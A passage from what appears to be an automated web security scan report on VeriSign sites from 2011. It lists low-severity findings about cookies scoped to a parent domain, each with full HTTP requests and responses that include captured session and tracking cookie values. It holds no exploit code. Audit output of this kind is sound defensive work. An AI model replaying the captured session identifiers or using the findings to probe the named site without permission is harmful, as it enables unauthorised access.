HTTP/1.1 200 OK
Date: Fri, 09 Sep 2011 21:26:33 GMT
Server: Apache
Set-Cookie: TLTHID=63C826F2DB2A10DB6A72CEC4D1E75D2A; Path=/; Domain=.verisign.com
Cache-Control: no-cache
Expires: Thu, 01 Dec 1994 16:00:00 GMT
Last-Modified: Fri, 27 May 2011 21:56:08 GMT
Accept-Ranges: bytes
Vary: Accept-Encoding
Content-Length: 1470
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: application/javascript


var oVal;var sessionTimerId=0;var SESSIONTIMEOUT=33*60*1000;function checkStatus(val){if(oVal!=val){window.location.reload();}}
function callServer(check,orig){var localHttpObj=getXMLHttpObj();oVal=o
...[SNIP]...

9.69. https://trust-center.verisign.com/rcm/verisign/scripts/tealeaf/TealeafSDK.js

Summary

Severity:   Information
Confidence:   Certain
Host:   https://trust-center.verisign.com
Path:   /rcm/verisign/scripts/tealeaf/TealeafSDK.js

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /rcm/verisign/scripts/tealeaf/TealeafSDK.js HTTP/1.1
Host: trust-center.verisign.com
Connection: keep-alive
Referer: https://trust-center.verisign.com/process/retail/trust_product_selector;jsessionid=8EDEEDCA5D5FDB78FD13458CCB776941?uid=51ed60d582dab5b65c3163309fa7184c&product=TRUSTSEAL001
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: v1st=1744DAB8D140F63E; IS3_History=0-0-0____; IS3_GSV=DPL-0_TES-1315621562_PCT-1315621562_GeoIP-*_GeoCo-_GeoRg-_GeoCt-_GeoNs-_GeoDm-; mbox=check#true#1315621641|session#1315621455064-973488#1315623441|PC#1315621455064-973488.19#1378693581; __utma=136906671.1087027796.1315621458.1315621458.1315621458.1; __utmb=136906671.4.10.1315621458; __utmc=136906671; __utmz=136906671.1315621458.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); TLTSID=621E7D88DB2A10DB44A3B1847A7DDBAF; TLTUID=621E7D88DB2A10DB44A3B1847A7DDBAF; JSESSIONID=8EDEEDCA5D5FDB78FD13458CCB776941; TLTHID=62FB56A4DB2A10DB6A70CEC4D1E75D2A

Response

HTTP/1.1 200 OK
Date: Fri, 09 Sep 2011 21:26:34 GMT
Server: Apache
Set-Cookie: TLTHID=648BEF60DB2A10DB6A75CEC4D1E75D2A; Path=/; Domain=.verisign.com
Cache-Control: no-cache
Expires: Thu, 01 Dec 1994 16:00:00 GMT
Last-Modified: Fri, 27 May 2011 21:56:09 GMT
Accept-Ranges: bytes
Vary: Accept-Encoding
Content-Length: 57905
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: application/javascript

if(TeaLeaf&&TeaLeaf.Configuration&&TeaLeaf.Configuration.tlinit==false){TeaLeaf.Configuration.tlinit=true;if(!Array.prototype.push){Array.prototype.stackEnd=0;Array.prototype.push=function(a){this[thi
...[SNIP]...

9.70. https://trust-center.verisign.com/rcm/verisign/scripts/tealeaf/TealeafSDKConfig.js

Summary

Severity:   Information
Confidence:   Certain
Host:   https://trust-center.verisign.com
Path:   /rcm/verisign/scripts/tealeaf/TealeafSDKConfig.js

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /rcm/verisign/scripts/tealeaf/TealeafSDKConfig.js HTTP/1.1
Host: trust-center.verisign.com
Connection: keep-alive
Referer: https://trust-center.verisign.com/process/retail/trust_product_selector;jsessionid=8EDEEDCA5D5FDB78FD13458CCB776941?uid=51ed60d582dab5b65c3163309fa7184c&product=TRUSTSEAL001
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: v1st=1744DAB8D140F63E; IS3_History=0-0-0____; IS3_GSV=DPL-0_TES-1315621562_PCT-1315621562_GeoIP-*_GeoCo-_GeoRg-_GeoCt-_GeoNs-_GeoDm-; mbox=check#true#1315621641|session#1315621455064-973488#1315623441|PC#1315621455064-973488.19#1378693581; __utma=136906671.1087027796.1315621458.1315621458.1315621458.1; __utmb=136906671.4.10.1315621458; __utmc=136906671; __utmz=136906671.1315621458.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); TLTSID=621E7D88DB2A10DB44A3B1847A7DDBAF; TLTUID=621E7D88DB2A10DB44A3B1847A7DDBAF; JSESSIONID=8EDEEDCA5D5FDB78FD13458CCB776941; TLTHID=62FB56A4DB2A10DB6A70CEC4D1E75D2A

Response

HTTP/1.1 200 OK
Date: Fri, 09 Sep 2011 21:26:33 GMT
Server: Apache
Set-Cookie: TLTHID=63C9FBBCDB2A10DB4CE79F6CAED9DACC; Path=/; Domain=.verisign.com
Cache-Control: no-cache
Expires: Thu, 01 Dec 1994 16:00:00 GMT
Last-Modified: Fri, 27 May 2011 21:56:09 GMT
Accept-Ranges: bytes
Vary: Accept-Encoding
Content-Length: 22968
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: application/javascript

/*
* Copyright . 1999-2009 TeaLeaf Technology, Inc.
* All rights reserved.
*
* THIS SOFTWARE IS PROVIDED BY TEALEAF ``AS IS''

...[SNIP]...

9.71. https://trust-center.verisign.com/rcm/verisign/scripts/trustcenter_capture_payment.js

Summary

Severity:   Information
Confidence:   Certain
Host:   https://trust-center.verisign.com
Path:   /rcm/verisign/scripts/trustcenter_capture_payment.js

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /rcm/verisign/scripts/trustcenter_capture_payment.js HTTP/1.1
Host: trust-center.verisign.com
Connection: keep-alive
Referer: https://trust-center.verisign.com/process/retail/trust_product_selector;jsessionid=8EDEEDCA5D5FDB78FD13458CCB776941?uid=51ed60d582dab5b65c3163309fa7184c&product=TRUSTSEAL001
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: v1st=1744DAB8D140F63E; IS3_History=0-0-0____; IS3_GSV=DPL-0_TES-1315621562_PCT-1315621562_GeoIP-*_GeoCo-_GeoRg-_GeoCt-_GeoNs-_GeoDm-; mbox=check#true#1315621641|session#1315621455064-973488#1315623441|PC#1315621455064-973488.19#1378693581; __utma=136906671.1087027796.1315621458.1315621458.1315621458.1; __utmb=136906671.4.10.1315621458; __utmc=136906671; __utmz=136906671.1315621458.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); TLTSID=621E7D88DB2A10DB44A3B1847A7DDBAF; TLTUID=621E7D88DB2A10DB44A3B1847A7DDBAF; JSESSIONID=8EDEEDCA5D5FDB78FD13458CCB776941; TLTHID=62FB56A4DB2A10DB6A70CEC4D1E75D2A

Response

HTTP/1.1 200 OK
Date: Fri, 09 Sep 2011 21:26:35 GMT
Server: Apache
Set-Cookie: TLTHID=6589B492DB2A10DB4CEF9F6CAED9DACC; Path=/; Domain=.verisign.com
Cache-Control: no-cache
Expires: Thu, 01 Dec 1994 16:00:00 GMT
Last-Modified: Fri, 27 May 2011 21:56:09 GMT
Accept-Ranges: bytes
Vary: Accept-Encoding
Content-Length: 4605
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: application/javascript


function onPaymentMethodChange(){var paymentMethodObj=getElement("enrollment.payment.paymentMethod");if(paymentMethodObj!==null){var radioLength=paymentMethodObj.length;var index=0;for(var i=0;i<radi
...[SNIP]...

9.72. https://trust-center.verisign.com/rcm/verisign/scripts/trustcenter_product_selector.js

Summary

Severity:   Information
Confidence:   Certain
Host:   https://trust-center.verisign.com
Path:   /rcm/verisign/scripts/trustcenter_product_selector.js

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /rcm/verisign/scripts/trustcenter_product_selector.js HTTP/1.1
Host: trust-center.verisign.com
Connection: keep-alive
Referer: https://trust-center.verisign.com/process/retail/trust_product_selector;jsessionid=8EDEEDCA5D5FDB78FD13458CCB776941?uid=51ed60d582dab5b65c3163309fa7184c&product=TRUSTSEAL001
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: v1st=1744DAB8D140F63E; IS3_History=0-0-0____; IS3_GSV=DPL-0_TES-1315621562_PCT-1315621562_GeoIP-*_GeoCo-_GeoRg-_GeoCt-_GeoNs-_GeoDm-; mbox=check#true#1315621641|session#1315621455064-973488#1315623441|PC#1315621455064-973488.19#1378693581; __utma=136906671.1087027796.1315621458.1315621458.1315621458.1; __utmb=136906671.4.10.1315621458; __utmc=136906671; __utmz=136906671.1315621458.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); TLTSID=621E7D88DB2A10DB44A3B1847A7DDBAF; TLTUID=621E7D88DB2A10DB44A3B1847A7DDBAF; JSESSIONID=8EDEEDCA5D5FDB78FD13458CCB776941; TLTHID=62FB56A4DB2A10DB6A70CEC4D1E75D2A

Response

HTTP/1.1 200 OK
Date: Fri, 09 Sep 2011 21:26:35 GMT
Server: Apache
Set-Cookie: TLTHID=657C8646DB2A10DB44AEB1847A7DDBAF; Path=/; Domain=.verisign.com
Cache-Control: no-cache
Expires: Thu, 01 Dec 1994 16:00:00 GMT
Last-Modified: Fri, 27 May 2011 21:56:09 GMT
Accept-Ranges: bytes
Vary: Accept-Encoding
Content-Length: 19769
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: application/javascript


var premiumSupportFee=0;var pciComplianceFee=0;var pricingMatrix=[];var validityObjFive=null;var validityObjFour=null;var validityObjThree=null;var validityObjTwo=null;var validityObjOne=null;var pro
...[SNIP]...

9.73. https://trust-center.verisign.com/rcm/verisign/scripts/utility.js

Summary

Severity:   Information
Confidence:   Certain
Host:   https://trust-center.verisign.com
Path:   /rcm/verisign/scripts/utility.js

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /rcm/verisign/scripts/utility.js HTTP/1.1
Host: trust-center.verisign.com
Connection: keep-alive
Referer: https://trust-center.verisign.com/process/retail/trust_product_selector;jsessionid=8EDEEDCA5D5FDB78FD13458CCB776941?uid=51ed60d582dab5b65c3163309fa7184c&product=TRUSTSEAL001
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: v1st=1744DAB8D140F63E; IS3_History=0-0-0____; IS3_GSV=DPL-0_TES-1315621562_PCT-1315621562_GeoIP-*_GeoCo-_GeoRg-_GeoCt-_GeoNs-_GeoDm-; mbox=check#true#1315621641|session#1315621455064-973488#1315623441|PC#1315621455064-973488.19#1378693581; __utma=136906671.1087027796.1315621458.1315621458.1315621458.1; __utmb=136906671.4.10.1315621458; __utmc=136906671; __utmz=136906671.1315621458.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); TLTSID=621E7D88DB2A10DB44A3B1847A7DDBAF; TLTUID=621E7D88DB2A10DB44A3B1847A7DDBAF; JSESSIONID=8EDEEDCA5D5FDB78FD13458CCB776941; TLTHID=62FB56A4DB2A10DB6A70CEC4D1E75D2A

Response

HTTP/1.1 200 OK
Date: Fri, 09 Sep 2011 21:26:34 GMT
Server: Apache
Set-Cookie: TLTHID=648BC83CDB2A10DB4CE99F6CAED9DACC; Path=/; Domain=.verisign.com
Cache-Control: no-cache
Expires: Thu, 01 Dec 1994 16:00:00 GMT
Last-Modified: Fri, 27 May 2011 21:56:09 GMT
Accept-Ranges: bytes
Vary: Accept-Encoding
Content-Length: 8013
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: application/javascript


var menuItemCurrentlyHasFocus=false;function MM_findObj(n,d){var p,i,x;if(!d){d=document;}
if((p=n.indexOf("?"))>0&&parent.frames.length){d=parent.frames[n.substring(p+1)].document;n=n.substring(0,p)
...[SNIP]...

9.74. https://trust-center.verisign.com/rcm/verisign/style/brand.css

Summary

Severity:   Information
Confidence:   Certain
Host:   https://trust-center.verisign.com
Path:   /rcm/verisign/style/brand.css

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /rcm/verisign/style/brand.css HTTP/1.1
Host: trust-center.verisign.com
Connection: keep-alive
Referer: https://trust-center.verisign.com/process/retail/trust_product_selector;jsessionid=8EDEEDCA5D5FDB78FD13458CCB776941?uid=51ed60d582dab5b65c3163309fa7184c&product=TRUSTSEAL001
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: v1st=1744DAB8D140F63E; IS3_History=0-0-0____; IS3_GSV=DPL-0_TES-1315621562_PCT-1315621562_GeoIP-*_GeoCo-_GeoRg-_GeoCt-_GeoNs-_GeoDm-; mbox=check#true#1315621641|session#1315621455064-973488#1315623441|PC#1315621455064-973488.19#1378693581; __utma=136906671.1087027796.1315621458.1315621458.1315621458.1; __utmb=136906671.4.10.1315621458; __utmc=136906671; __utmz=136906671.1315621458.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); TLTSID=621E7D88DB2A10DB44A3B1847A7DDBAF; TLTUID=621E7D88DB2A10DB44A3B1847A7DDBAF; JSESSIONID=8EDEEDCA5D5FDB78FD13458CCB776941; TLTHID=62FB56A4DB2A10DB6A70CEC4D1E75D2A

Response

HTTP/1.1 200 OK
Date: Fri, 09 Sep 2011 21:26:32 GMT
Server: Apache
Set-Cookie: TLTHID=63B1D50ADB2A10DB4CE69F6CAED9DACC; Path=/; Domain=.verisign.com
Last-Modified: Fri, 27 May 2011 21:56:05 GMT
Accept-Ranges: bytes
Vary: Accept-Encoding
Content-Length: 7437
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: text/css

@import "vrsn.css";
#vrsn_standard_bar{background-color:#9B0033;clear:both;color:#FFFFFF;font-size:.8em;height:2em;text-align:center;width:100%;}
#vrsn_standard_bar_footer{border-top:1px solid #EDEDEE
...[SNIP]...

9.75. https://trust-center.verisign.com/rcm/verisign/style/capture_payment.css

Summary

Severity:   Information
Confidence:   Certain
Host:   https://trust-center.verisign.com
Path:   /rcm/verisign/style/capture_payment.css

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /rcm/verisign/style/capture_payment.css HTTP/1.1
Host: trust-center.verisign.com
Connection: keep-alive
Referer: https://trust-center.verisign.com/process/retail/trust_product_selector;jsessionid=8EDEEDCA5D5FDB78FD13458CCB776941?uid=51ed60d582dab5b65c3163309fa7184c&product=TRUSTSEAL001
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: v1st=1744DAB8D140F63E; IS3_History=0-0-0____; IS3_GSV=DPL-0_TES-1315621562_PCT-1315621562_GeoIP-*_GeoCo-_GeoRg-_GeoCt-_GeoNs-_GeoDm-; mbox=check#true#1315621641|session#1315621455064-973488#1315623441|PC#1315621455064-973488.19#1378693581; __utma=136906671.1087027796.1315621458.1315621458.1315621458.1; __utmb=136906671.4.10.1315621458; __utmc=136906671; __utmz=136906671.1315621458.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); TLTSID=621E7D88DB2A10DB44A3B1847A7DDBAF; TLTUID=621E7D88DB2A10DB44A3B1847A7DDBAF; JSESSIONID=8EDEEDCA5D5FDB78FD13458CCB776941; TLTHID=62FB56A4DB2A10DB6A70CEC4D1E75D2A

Response

HTTP/1.1 200 OK
Date: Fri, 09 Sep 2011 21:26:37 GMT
Server: Apache
Set-Cookie: TLTHID=6655F87CDB2A10DB4CF09F6CAED9DACC; Path=/; Domain=.verisign.com
Last-Modified: Fri, 27 May 2011 21:56:08 GMT
Accept-Ranges: bytes
Vary: Accept-Encoding
Content-Length: 2075
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: text/css

/*import from capture_payment.css - Coakley 10_5_2010 */
.radio_button {width:180px;}
.blurb {padding-left:5px;padding-bottom:10px;}
#tax_exemption_section {margin-left:35px;}
.content_line {    position
...[SNIP]...

9.76. https://trust-center.verisign.com/rcm/verisign/style/minimal_form.css

Summary

Severity:   Information
Confidence:   Certain
Host:   https://trust-center.verisign.com
Path:   /rcm/verisign/style/minimal_form.css

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /rcm/verisign/style/minimal_form.css HTTP/1.1
Host: trust-center.verisign.com
Connection: keep-alive
Referer: https://trust-center.verisign.com/process/retail/trust_product_selector;jsessionid=8EDEEDCA5D5FDB78FD13458CCB776941?uid=51ed60d582dab5b65c3163309fa7184c&product=TRUSTSEAL001
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: v1st=1744DAB8D140F63E; IS3_History=0-0-0____; IS3_GSV=DPL-0_TES-1315621562_PCT-1315621562_GeoIP-*_GeoCo-_GeoRg-_GeoCt-_GeoNs-_GeoDm-; mbox=check#true#1315621641|session#1315621455064-973488#1315623441|PC#1315621455064-973488.19#1378693581; __utma=136906671.1087027796.1315621458.1315621458.1315621458.1; __utmb=136906671.4.10.1315621458; __utmc=136906671; __utmz=136906671.1315621458.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); TLTSID=621E7D88DB2A10DB44A3B1847A7DDBAF; TLTUID=621E7D88DB2A10DB44A3B1847A7DDBAF; JSESSIONID=8EDEEDCA5D5FDB78FD13458CCB776941; TLTHID=62FB56A4DB2A10DB6A70CEC4D1E75D2A

Response

HTTP/1.1 200 OK
Date: Fri, 09 Sep 2011 21:26:32 GMT
Server: Apache
Set-Cookie: TLTHID=63B3241EDB2A10DB44A6B1847A7DDBAF; Path=/; Domain=.verisign.com
Last-Modified: Fri, 27 May 2011 21:56:08 GMT
Accept-Ranges: bytes
Vary: Accept-Encoding
Content-Length: 3324
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: text/css

#quick_signin_box {position:relative;top:0px;margin:0px;}
.minimal-form-gray, .minimal-form-gray * {background-color:gray;}
.minimal-form, .minimal-form-gray{border:solid 1px #5C554B;height:auto;t
...[SNIP]...

9.77. https://trust-center.verisign.com/rcm/verisign/style/module.css

Summary

Severity:   Information
Confidence:   Certain
Host:   https://trust-center.verisign.com
Path:   /rcm/verisign/style/module.css

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /rcm/verisign/style/module.css HTTP/1.1
Host: trust-center.verisign.com
Connection: keep-alive
Referer: https://trust-center.verisign.com/process/retail/trust_product_selector;jsessionid=8EDEEDCA5D5FDB78FD13458CCB776941?uid=51ed60d582dab5b65c3163309fa7184c&product=TRUSTSEAL001
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: v1st=1744DAB8D140F63E; IS3_History=0-0-0____; IS3_GSV=DPL-0_TES-1315621562_PCT-1315621562_GeoIP-*_GeoCo-_GeoRg-_GeoCt-_GeoNs-_GeoDm-; mbox=check#true#1315621641|session#1315621455064-973488#1315623441|PC#1315621455064-973488.19#1378693581; __utma=136906671.1087027796.1315621458.1315621458.1315621458.1; __utmb=136906671.4.10.1315621458; __utmc=136906671; __utmz=136906671.1315621458.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); TLTSID=621E7D88DB2A10DB44A3B1847A7DDBAF; TLTUID=621E7D88DB2A10DB44A3B1847A7DDBAF; JSESSIONID=8EDEEDCA5D5FDB78FD13458CCB776941; TLTHID=62FB56A4DB2A10DB6A70CEC4D1E75D2A

Response

HTTP/1.1 200 OK
Date: Fri, 09 Sep 2011 21:26:32 GMT
Server: Apache
Set-Cookie: TLTHID=63B20958DB2A10DB6A71CEC4D1E75D2A; Path=/; Domain=.verisign.com
Last-Modified: Fri, 27 May 2011 21:56:08 GMT
Accept-Ranges: bytes
Vary: Accept-Encoding
Content-Length: 698
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: text/css

#ratepointbox{background-color:#FFFFFF;border:1px solid #999999;margin-bottom:10px;padding:1px;width:196px;}
#ratepointbox .header{background-image:url(../images/ratepoint_header_bg.gif);background-po
...[SNIP]...

9.78. https://trust-center.verisign.com/rcm/verisign/style/product_selector.css

Summary

Severity:   Information
Confidence:   Certain
Host:   https://trust-center.verisign.com
Path:   /rcm/verisign/style/product_selector.css

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /rcm/verisign/style/product_selector.css HTTP/1.1
Host: trust-center.verisign.com
Connection: keep-alive
Referer: https://trust-center.verisign.com/process/retail/trust_product_selector;jsessionid=8EDEEDCA5D5FDB78FD13458CCB776941?uid=51ed60d582dab5b65c3163309fa7184c&product=TRUSTSEAL001
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: v1st=1744DAB8D140F63E; IS3_History=0-0-0____; IS3_GSV=DPL-0_TES-1315621562_PCT-1315621562_GeoIP-*_GeoCo-_GeoRg-_GeoCt-_GeoNs-_GeoDm-; mbox=check#true#1315621641|session#1315621455064-973488#1315623441|PC#1315621455064-973488.19#1378693581; __utma=136906671.1087027796.1315621458.1315621458.1315621458.1; __utmb=136906671.4.10.1315621458; __utmc=136906671; __utmz=136906671.1315621458.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); TLTSID=621E7D88DB2A10DB44A3B1847A7DDBAF; TLTUID=621E7D88DB2A10DB44A3B1847A7DDBAF; JSESSIONID=8EDEEDCA5D5FDB78FD13458CCB776941; TLTHID=62FB56A4DB2A10DB6A70CEC4D1E75D2A

Response

HTTP/1.1 200 OK
Date: Fri, 09 Sep 2011 21:26:32 GMT
Server: Apache
Set-Cookie: TLTHID=63B2FDB8DB2A10DB44A5B1847A7DDBAF; Path=/; Domain=.verisign.com
Last-Modified: Fri, 27 May 2011 21:56:08 GMT
Accept-Ranges: bytes
Vary: Accept-Encoding
Content-Length: 9496
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: text/css

#comparison_chart_panel{position:absolute;right:20px;top:0;}
#product_ssp_ev{background-image:url(../images/SSP_EV.jpg);background-position:top;background-repeat:no-repeat;float:left;margin-bottom:0;
...[SNIP]...

9.79. https://trust-center.verisign.com/rcm/verisign/style/vrsn.css

Summary

Severity:   Information
Confidence:   Certain
Host:   https://trust-center.verisign.com
Path:   /rcm/verisign/style/vrsn.css

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /rcm/verisign/style/vrsn.css HTTP/1.1
Host: trust-center.verisign.com
Connection: keep-alive
Referer: https://trust-center.verisign.com/process/retail/trust_product_selector;jsessionid=8EDEEDCA5D5FDB78FD13458CCB776941?uid=51ed60d582dab5b65c3163309fa7184c&product=TRUSTSEAL001
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: v1st=1744DAB8D140F63E; IS3_History=0-0-0____; IS3_GSV=DPL-0_TES-1315621562_PCT-1315621562_GeoIP-*_GeoCo-_GeoRg-_GeoCt-_GeoNs-_GeoDm-; mbox=check#true#1315621641|session#1315621455064-973488#1315623441|PC#1315621455064-973488.19#1378693581; __utma=136906671.1087027796.1315621458.1315621458.1315621458.1; __utmb=136906671.4.10.1315621458; __utmc=136906671; __utmz=136906671.1315621458.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); TLTSID=621E7D88DB2A10DB44A3B1847A7DDBAF; TLTUID=621E7D88DB2A10DB44A3B1847A7DDBAF; JSESSIONID=8EDEEDCA5D5FDB78FD13458CCB776941; TLTHID=63B1D50ADB2A10DB4CE69F6CAED9DACC

Response

HTTP/1.1 200 OK
Date: Fri, 09 Sep 2011 21:26:37 GMT
Server: Apache
Set-Cookie: TLTHID=666769EADB2A10DB44B1B1847A7DDBAF; Path=/; Domain=.verisign.com
Last-Modified: Fri, 27 May 2011 21:56:08 GMT
Accept-Ranges: bytes
Vary: Accept-Encoding
Content-Length: 30719
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: text/css

body{color:#000;font-family:arial, helvetica, sans-serif;font-size:12px;height:100%;margin:0}
a:link,a:visited{color:#1446A8;text-decoration:underline}
h3{margin:0 0 0.8em;padding:0 0 0 1em;width:98%}
...[SNIP]...

9.80. http://www.verisign.ch/assets/shared/images/sm_004276_oo.gif

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.verisign.ch
Path:   /assets/shared/images/sm_004276_oo.gif

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /assets/shared/images/sm_004276_oo.gif HTTP/1.1
Host: www.verisign.ch
Proxy-Connection: keep-alive
Referer: http://query.verisign.com/search?q=xss&site=vrsn&client=vrsn_frontend&output=xml_no_dtd&proxystylesheet=vrsn_frontend
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Fri, 09 Sep 2011 21:24:47 GMT
Server: Apache
Set-Cookie: v1st=85AC46EBE3E5BE40; path=/; expires=Wed, 19 Feb 2020 14:28:00 GMT; domain=.verisign.ch
Last-Modified: Wed, 19 Jan 2011 20:21:22 GMT
ETag: "2e58332-255-49a38c2aff480"
Accept-Ranges: bytes
Content-Length: 597
X-UA-Compatible: IE=EmulateIE7
Content-Type: image/gif

...[SNIP]...

9.81. http://www.verisign.co.uk/hp07/i/vlogo.gif

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.verisign.co.uk
Path:   /hp07/i/vlogo.gif

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /hp07/i/vlogo.gif HTTP/1.1
Host: www.verisign.co.uk
Proxy-Connection: keep-alive
Referer: http://www.verisign.ch/contact-information/index.html?tid=footer
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
